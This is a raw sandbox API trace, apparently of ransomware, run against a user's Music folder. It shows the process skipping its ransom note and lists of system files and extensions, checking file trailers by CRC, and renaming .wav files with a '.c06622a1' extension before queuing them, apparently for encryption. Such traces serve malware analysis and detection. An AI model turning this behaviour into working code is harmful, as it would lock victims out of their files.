RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1e2d80ea [0160.058] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x216ce86e [0160.061] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0x5bdde583 [0160.061] RtlComputeCrc32 (PartialCrc=0xe583, Buffer=0x35a0094, Length=0x80) returned 0x17f29344 [0160.061] RtlComputeCrc32 (PartialCrc=0x9344, Buffer=0x35a0094, Length=0x80) returned 0x4b5a1d68 [0160.061] RtlComputeCrc32 (PartialCrc=0x1d68, Buffer=0x35a0094, Length=0x80) returned 0xf126ed38 [0160.061] RtlComputeCrc32 (PartialCrc=0xed38, Buffer=0x35a0094, Length=0x80) returned 0x80444ed3 [0160.061] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0160.061] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0160.061] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0160.061] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d1038e0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8d1038e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8d1038e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0160.061] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0160.061] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75ca4de0, ftCreationTime.dwHighDateTime=0x1d5dc29, ftLastAccessTime.dwLowDateTime=0xb6e85010, ftLastAccessTime.dwHighDateTime=0x1d5e2af, ftLastWriteTime.dwLowDateTime=0xb6e85010, ftLastWriteTime.dwHighDateTime=0x1d5e2af, nFileSizeHigh=0x0, nFileSizeLow=0x111d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="va_1xt0NyXWscYIzlv.wav", cAlternateFileName="VA_1XT~1.WAV")) returned 1 [0160.061] _wcsicmp (_Str1="va_1xt0NyXWscYIzlv.wav", _Str2="README.c06622a1.TXT") returned 4 [0160.061] wcsstr (_Str="va_1xt0NyXWscYIzlv.wav", _SubStr="README") returned 0x0 [0160.061] _wcsicmp (_Str1="autorun.inf", _Str2="va_1xt0NyXWscYIzlv.wav") returned -21 [0160.061] wcslen (_String="autorun.inf") returned 0xb [0160.061] _wcsicmp (_Str1="boot.ini", _Str2="va_1xt0NyXWscYIzlv.wav") returned -20 [0160.061] wcslen (_String="boot.ini") returned 0x8 [0160.061] _wcsicmp (_Str1="bootfont.bin", _Str2="va_1xt0NyXWscYIzlv.wav") returned -20 [0160.061] wcslen (_String="bootfont.bin") returned 0xc [0160.061] _wcsicmp (_Str1="bootsect.bak", _Str2="va_1xt0NyXWscYIzlv.wav") returned -20 [0160.061] wcslen (_String="bootsect.bak") returned 0xc [0160.061] _wcsicmp (_Str1="desktop.ini", _Str2="va_1xt0NyXWscYIzlv.wav") returned -18 [0160.062] wcslen (_String="desktop.ini") returned 0xb [0160.062] _wcsicmp (_Str1="iconcache.db", _Str2="va_1xt0NyXWscYIzlv.wav") returned -13 [0160.062] wcslen (_String="iconcache.db") returned 0xc [0160.062] _wcsicmp (_Str1="ntldr", _Str2="va_1xt0NyXWscYIzlv.wav") returned -8 [0160.062] wcslen (_String="ntldr") returned 0x5 [0160.062] _wcsicmp (_Str1="ntuser.dat", _Str2="va_1xt0NyXWscYIzlv.wav") returned -8 [0160.062] wcslen (_String="ntuser.dat") returned 0xa [0160.062] _wcsicmp (_Str1="ntuser.dat.log", _Str2="va_1xt0NyXWscYIzlv.wav") returned -8 [0160.062] wcslen (_String="ntuser.dat.log") returned 0xe [0160.062] _wcsicmp (_Str1="ntuser.ini", _Str2="va_1xt0NyXWscYIzlv.wav") returned -8 [0160.062] wcslen (_String="ntuser.ini") returned 0xa [0160.062] _wcsicmp (_Str1="thumbs.db", _Str2="va_1xt0NyXWscYIzlv.wav") returned -2 [0160.062] wcslen (_String="thumbs.db") returned 0x9 [0160.062] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0160.062] wcslen (_String="386") returned 0x3 [0160.062] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0160.062] wcslen (_String="adv") returned 0x3 [0160.062] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0160.062] wcslen (_String="ani") returned 0x3 [0160.062] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0160.062] wcslen (_String="bat") returned 0x3 [0160.062] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0160.062] wcslen (_String="bin") returned 0x3 [0160.062] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0160.062] wcslen (_String="cab") returned 0x3 [0160.062] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0160.062] wcslen (_String="cmd") returned 0x3 [0160.063] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0160.063] wcslen (_String="com") returned 0x3 [0160.063] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0160.063] wcslen (_String="cpl") returned 0x3 [0160.063] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0160.063] wcslen (_String="cur") returned 0x3 [0160.063] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0160.063] wcslen (_String="deskthemepack") returned 0xd [0160.063] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0160.063] wcslen (_String="diagcab") returned 0x7 [0160.063] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0160.063] wcslen (_String="diagcfg") returned 0x7 [0160.063] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0160.063] wcslen (_String="diagpkg") returned 0x7 [0160.063] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0160.063] wcslen (_String="dll") returned 0x3 [0160.063] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0160.063] wcslen (_String="drv") returned 0x3 [0160.063] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0160.063] wcslen (_String="exe") returned 0x3 [0160.063] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0160.063] wcslen (_String="hlp") returned 0x3 [0160.063] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0160.063] wcslen (_String="icl") returned 0x3 [0160.063] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0160.063] wcslen (_String="icns") returned 0x4 [0160.063] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0160.063] wcslen (_String="ico") returned 0x3 [0160.063] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0160.063] wcslen (_String="ics") returned 0x3 [0160.063] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0160.063] wcslen (_String="idx") returned 0x3 [0160.063] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0160.064] wcslen (_String="ldf") returned 0x3 [0160.064] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0160.064] wcslen (_String="lnk") returned 0x3 [0160.064] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0160.064] wcslen (_String="mod") returned 0x3 [0160.064] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0160.064] wcslen (_String="mpa") returned 0x3 [0160.064] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0160.064] wcslen (_String="msc") returned 0x3 [0160.064] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0160.064] wcslen (_String="msp") returned 0x3 [0160.064] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0160.064] wcslen (_String="msstyles") returned 0x8 [0160.064] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0160.064] wcslen (_String="msu") returned 0x3 [0160.064] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0160.064] wcslen (_String="nls") returned 0x3 [0160.064] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0160.064] wcslen (_String="nomedia") returned 0x7 [0160.064] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0160.064] wcslen (_String="ocx") returned 0x3 [0160.064] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0160.064] wcslen (_String="prf") returned 0x3 [0160.064] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0160.064] wcslen (_String="ps1") returned 0x3 [0160.064] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0160.064] wcslen (_String="rom") returned 0x3 [0160.064] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0160.064] wcslen (_String="rtp") returned 0x3 [0160.064] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0160.065] wcslen (_String="scr") returned 0x3 [0160.065] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0160.065] wcslen (_String="shs") returned 0x3 [0160.065] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0160.065] wcslen (_String="spl") returned 0x3 [0160.065] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0160.065] wcslen (_String="sys") returned 0x3 [0160.065] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0160.065] wcslen (_String="theme") returned 0x5 [0160.065] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0160.065] wcslen (_String="themepack") returned 0x9 [0160.065] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0160.065] wcslen (_String="wpx") returned 0x3 [0160.065] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0160.065] wcslen (_String="lock") returned 0x4 [0160.065] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0160.065] wcslen (_String="key") returned 0x3 [0160.065] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0160.065] wcslen (_String="hta") returned 0x3 [0160.065] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0160.065] wcslen (_String="msi") returned 0x3 [0160.065] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0160.065] wcslen (_String="pdb") returned 0x3 [0160.065] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0160.065] wcslen (_String="sqlite") returned 0x6 [0160.065] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l")) returned 0x10 [0160.065] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0160.065] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" [0160.066] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned 0x3f [0160.066] wcscpy (in: _Dest=0x32a2110, _Source="va_1xt0NyXWscYIzlv.wav" | out: _Dest="va_1xt0NyXWscYIzlv.wav") returned="va_1xt0NyXWscYIzlv.wav" [0160.066] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\va_1xt0NyXWscYIzlv.wav", dwFileAttributes=0x80) returned 1 [0160.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\va_1xt0NyXWscYIzlv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\va_1xt0nyxwscyizlv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0160.066] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.066] ReadFile (in: hFile=0x1f4, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0160.067] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0xdf84b7b2 [0160.067] RtlComputeCrc32 (PartialCrc=0xb7b2, Buffer=0x32e4a4, Length=0x80) returned 0xccdb92b3 [0160.067] RtlComputeCrc32 (PartialCrc=0x92b3, Buffer=0x32e4a4, Length=0x80) returned 0xff9b3397 [0160.067] RtlComputeCrc32 (PartialCrc=0x3397, Buffer=0x32e4a4, Length=0x80) returned 0x3eae5ec4 [0160.067] RtlComputeCrc32 (PartialCrc=0x5ec4, Buffer=0x32e4a4, Length=0x80) returned 0x9c2e9e0b [0160.067] CloseHandle (hObject=0x1f4) returned 1 [0160.067] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0160.067] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\va_1xt0NyXWscYIzlv.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\va_1xt0NyXWscYIzlv.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\va_1xt0NyXWscYIzlv.wav" [0160.067] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\va_1xt0NyXWscYIzlv.wav") returned 0x56 [0160.067] wcscpy (in: _Dest=0x32b2144, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.067] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\va_1xt0NyXWscYIzlv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\va_1xt0nyxwscyizlv.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\va_1xt0NyXWscYIzlv.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\va_1xt0nyxwscyizlv.wav.c06622a1"), dwFlags=0x8) returned 1 [0160.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\va_1xt0NyXWscYIzlv.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\va_1xt0nyxwscyizlv.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f4 [0160.069] CreateIoCompletionPort (FileHandle=0x1f4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.070] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3630020 [0160.077] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5c0cc73e [0160.077] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x44ec0850 [0160.077] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5cee0ca7 [0160.077] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x70ef6b09 [0160.077] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x34225a86 [0160.077] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29be8813 [0160.077] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x8d9dbfd [0160.077] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x78f394c0 [0160.081] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3630094, Length=0x80) returned 0xf8287cde [0160.081] RtlComputeCrc32 (PartialCrc=0x7cde, Buffer=0x3630094, Length=0x80) returned 0xef315fda [0160.081] RtlComputeCrc32 (PartialCrc=0x5fda, Buffer=0x3630094, Length=0x80) returned 0x402bd6ec [0160.081] RtlComputeCrc32 (PartialCrc=0xd6ec, Buffer=0x3630094, Length=0x80) returned 0xa9bde84c [0160.081] RtlComputeCrc32 (PartialCrc=0xe84c, Buffer=0x3630094, Length=0x80) returned 0x2c8b49da [0160.081] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3630020) returned 1 [0160.081] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0160.081] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0160.081] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd954830, ftCreationTime.dwHighDateTime=0x1d5da00, ftLastAccessTime.dwLowDateTime=0xce002540, ftLastAccessTime.dwHighDateTime=0x1d5df88, ftLastWriteTime.dwLowDateTime=0xce002540, ftLastWriteTime.dwHighDateTime=0x1d5df88, nFileSizeHigh=0x0, nFileSizeLow=0x1796c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ynIixMPajD.wav", cAlternateFileName="YNIIXM~1.WAV")) returned 1 [0160.081] _wcsicmp (_Str1="ynIixMPajD.wav", _Str2="README.c06622a1.TXT") returned 7 [0160.081] wcsstr (_Str="ynIixMPajD.wav", _SubStr="README") returned 0x0 [0160.081] _wcsicmp (_Str1="autorun.inf", _Str2="ynIixMPajD.wav") returned -24 [0160.081] wcslen (_String="autorun.inf") returned 0xb [0160.081] _wcsicmp (_Str1="boot.ini", _Str2="ynIixMPajD.wav") returned -23 [0160.082] wcslen (_String="boot.ini") returned 0x8 [0160.082] _wcsicmp (_Str1="bootfont.bin", _Str2="ynIixMPajD.wav") returned -23 [0160.082] wcslen (_String="bootfont.bin") returned 0xc [0160.082] _wcsicmp (_Str1="bootsect.bak", _Str2="ynIixMPajD.wav") returned -23 [0160.082] wcslen (_String="bootsect.bak") returned 0xc [0160.082] _wcsicmp (_Str1="desktop.ini", _Str2="ynIixMPajD.wav") returned -21 [0160.082] wcslen (_String="desktop.ini") returned 0xb [0160.082] _wcsicmp (_Str1="iconcache.db", _Str2="ynIixMPajD.wav") returned -16 [0160.082] wcslen (_String="iconcache.db") returned 0xc [0160.082] _wcsicmp (_Str1="ntldr", _Str2="ynIixMPajD.wav") returned -11 [0160.082] wcslen (_String="ntldr") returned 0x5 [0160.082] _wcsicmp (_Str1="ntuser.dat", _Str2="ynIixMPajD.wav") returned -11 [0160.082] wcslen (_String="ntuser.dat") returned 0xa [0160.082] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ynIixMPajD.wav") returned -11 [0160.082] wcslen (_String="ntuser.dat.log") returned 0xe [0160.082] _wcsicmp (_Str1="ntuser.ini", _Str2="ynIixMPajD.wav") returned -11 [0160.082] wcslen (_String="ntuser.ini") returned 0xa [0160.082] _wcsicmp (_Str1="thumbs.db", _Str2="ynIixMPajD.wav") returned -5 [0160.082] wcslen (_String="thumbs.db") returned 0x9 [0160.082] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0160.082] wcslen (_String="386") returned 0x3 [0160.082] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0160.082] wcslen (_String="adv") returned 0x3 [0160.082] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0160.083] wcslen (_String="ani") returned 0x3 [0160.083] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0160.083] wcslen (_String="bat") returned 0x3 [0160.083] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0160.083] wcslen (_String="bin") returned 0x3 [0160.083] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0160.083] wcslen (_String="cab") returned 0x3 [0160.083] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0160.083] wcslen (_String="cmd") returned 0x3 [0160.083] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0160.083] wcslen (_String="com") returned 0x3 [0160.083] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0160.083] wcslen (_String="cpl") returned 0x3 [0160.083] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0160.083] wcslen (_String="cur") returned 0x3 [0160.083] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0160.083] wcslen (_String="deskthemepack") returned 0xd [0160.083] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0160.083] wcslen (_String="diagcab") returned 0x7 [0160.083] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0160.083] wcslen (_String="diagcfg") returned 0x7 [0160.083] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0160.083] wcslen (_String="diagpkg") returned 0x7 [0160.083] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0160.083] wcslen (_String="dll") returned 0x3 [0160.083] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0160.084] wcslen (_String="drv") returned 0x3 [0160.084] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0160.084] wcslen (_String="exe") returned 0x3 [0160.084] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0160.084] wcslen (_String="hlp") returned 0x3 [0160.084] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0160.084] wcslen (_String="icl") returned 0x3 [0160.084] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0160.084] wcslen (_String="icns") returned 0x4 [0160.084] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0160.084] wcslen (_String="ico") returned 0x3 [0160.084] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0160.084] wcslen (_String="ics") returned 0x3 [0160.084] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0160.084] wcslen (_String="idx") returned 0x3 [0160.084] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0160.084] wcslen (_String="ldf") returned 0x3 [0160.084] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0160.084] wcslen (_String="lnk") returned 0x3 [0160.084] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0160.084] wcslen (_String="mod") returned 0x3 [0160.084] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0160.084] wcslen (_String="mpa") returned 0x3 [0160.084] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0160.084] wcslen (_String="msc") returned 0x3 [0160.084] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0160.085] wcslen (_String="msp") returned 0x3 [0160.085] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0160.085] wcslen (_String="msstyles") returned 0x8 [0160.085] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0160.085] wcslen (_String="msu") returned 0x3 [0160.085] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0160.085] wcslen (_String="nls") returned 0x3 [0160.085] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0160.085] wcslen (_String="nomedia") returned 0x7 [0160.085] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0160.085] wcslen (_String="ocx") returned 0x3 [0160.085] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0160.085] wcslen (_String="prf") returned 0x3 [0160.085] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0160.085] wcslen (_String="ps1") returned 0x3 [0160.085] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0160.085] wcslen (_String="rom") returned 0x3 [0160.085] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0160.085] wcslen (_String="rtp") returned 0x3 [0160.085] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0160.085] wcslen (_String="scr") returned 0x3 [0160.085] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0160.085] wcslen (_String="shs") returned 0x3 [0160.085] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0160.085] wcslen (_String="spl") returned 0x3 [0160.086] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0160.086] wcslen (_String="sys") returned 0x3 [0160.086] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0160.086] wcslen (_String="theme") returned 0x5 [0160.086] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0160.086] wcslen (_String="themepack") returned 0x9 [0160.086] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0160.086] wcslen (_String="wpx") returned 0x3 [0160.086] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0160.086] wcslen (_String="lock") returned 0x4 [0160.086] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0160.086] wcslen (_String="key") returned 0x3 [0160.086] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0160.086] wcslen (_String="hta") returned 0x3 [0160.086] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0160.086] wcslen (_String="msi") returned 0x3 [0160.086] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0160.086] wcslen (_String="pdb") returned 0x3 [0160.086] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0160.086] wcslen (_String="sqlite") returned 0x6 [0160.086] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l")) returned 0x10 [0160.087] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0160.087] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L" [0160.087] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L") returned 0x3f [0160.087] wcscpy (in: _Dest=0x32a2110, _Source="ynIixMPajD.wav" | out: _Dest="ynIixMPajD.wav") returned="ynIixMPajD.wav" [0160.087] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\ynIixMPajD.wav", dwFileAttributes=0x80) returned 1 [0160.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\4lOUbG\\LPnP0zZ7L\\ynIixMPajD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\4loubg\\lpnp0zz7l\\yniixmpajd.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0160.087] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.087] ReadFile (in: hFile=0x19c, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0160.089] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0xb061c10e [0160.089] RtlComputeCrc32 (PartialCrc=0xc10e, Buffer=0x32e4a4, Length=0x80) returned 0xdb0b1952 [0160.089] 